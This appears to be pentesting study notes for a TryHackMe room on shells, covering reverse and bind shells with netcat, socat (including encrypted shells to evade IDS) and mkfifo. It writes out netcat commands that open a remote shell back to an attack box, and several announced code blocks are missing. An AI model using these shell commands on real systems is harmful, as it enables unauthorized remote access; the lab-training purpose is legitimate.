Shells
https://tryhackme.com/r/room/introtoshells
Last updated
https://tryhackme.com/r/room/introtoshells
Last updated
There are two kinds of shell when it comes to exploiting a target:
Reverse Shell: When the target is forced to execute code that connects back to the attack box.
ATTACK BOX: nc -nvlp 1337
TARGET: nc -nv $ATTACKBOX 1337 -e /bin/bash
Bind Shell: The code executed on the target is used to start a listener attached to a shell.
TARGET: nc -nvlp 1337 -e "cmd.exe"
ATTACK BOX: nc $TARGET 1337
Shells can also be either interactive or non-interactive.
Interactive: These shells allow a user to interact with programs after execution. Some programs require interaction such as ssh commands with a password or sudo commands with a password.
Non-Interactive: The user is limited to using programs that do not require user interaction. This can cause interactive commands to make a non-interactive shell stall and become unusable because the expected input is being asked in another location.
Netcat is the most basic tool in a pentester's toolkit when it comes to networking.
Reverse Shell: nc -nvlp $PORT
-l: Tells netcat it is a listener
-v: Requests verbose output
-n: Tells netcat not to resolve host names or use DNS
-p: Indications that a port specification will follow
Bind Shell: nc $TARGET $PORT
The socat tool acts as a connector between two points. These points could be listening ports, keyboards, files, etcetera.
Reverse Shell: socat TCP-l:$PORT -
To connect to this reverse shell listening on an attack box, the following commands can be used from the following Windows or Linux target:
The pipes option is used to force powershell to use Unix style standard input and output.
Bind Shell: socat TCP:$TARGET:$PORT -
To start the bind shell on the target, the following command can be used:
Socat can also be used to build a fully stable Linux tty reverse shell. It is significantly more stable than the standard socat tunnel or a netcat connection.
TTY Listener: socat TCP-L:$PORT FILE:`tty`,raw,echo=0
The target must have socat installed to connect back to this specific listner. If not, downloading a precompiled socat binary can also execute the reverse shell. The connect command from the target would look like the following:
Another great capability of socat is creating encrypted shells. This can be used to help bypass an IDS. The first step is generating a certificate in order to use encryption:
This command creates a 2048 bit RSA key with matching cert file, self-signed, and valid for a year. The next part will be merging the two created files:
Now, using the pem file, the listener and connectors can be set up for either reverse shells or bind shells.
Reverse Shell
Bind Shell
The tool mkfifo which is used to make a named pipe (first in-first out), can also be used to make a reverse shell.
Listener:
The command first makes a named pipe at /tmp/f. Then a simple netcat listener is made which connects to the output of the named pipe. The output is immediately piped directly into /bin/sh, sending the stderr output stream into stdout, and sending stdout itself into the input of the named pipe. The connector can be done similarily with the following commands.
Connector:
When targeting a Windows machine, it is common to utilize a Powershell reverse shell. The following is a powershell reverse shell that can be used to connect to a listener on the attack box:
